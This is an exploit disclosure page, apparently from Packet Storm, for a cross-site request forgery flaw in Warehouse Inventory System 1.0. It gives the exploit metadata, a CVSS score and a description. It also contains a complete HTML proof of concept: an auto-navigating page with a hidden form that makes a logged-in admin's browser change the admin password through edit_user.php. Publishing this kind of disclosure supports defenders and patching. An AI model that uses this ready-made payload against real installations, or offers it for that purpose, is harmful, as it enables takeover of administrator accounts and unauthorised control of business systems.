Warehouse Inventory System version 1.0 suffers from a cross site request forgery vulnerability.
9259a5dd56037ce00a387f69f7055e6c55dbde1233f6394e2f390ff750bc8b9b# Exploit Title: Warehouse Inventory System - Cross-Site Request Forgery (CSRF) - Change Admin Password
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# Date: August 9th, 2020
# Vendor Homepage: https://oswapp.com
# Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip
# Version: 1.0
# Tested On: Windows 10 Pro + XAMPP | Python 2.7
# CWE-352: Cross-Site Request Forgery (CSRF)
# CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's
# Warehouuse Inventory System v1.0 allows remote attackers to change the admins password
# via authenticated admin visiting a third-party site.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://<IP_ADDRESS>/edit_user.php?id=1" method="POST">
<input type="hidden" name="password" value="Boku123!" />
<input type="hidden" name="update-pass" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed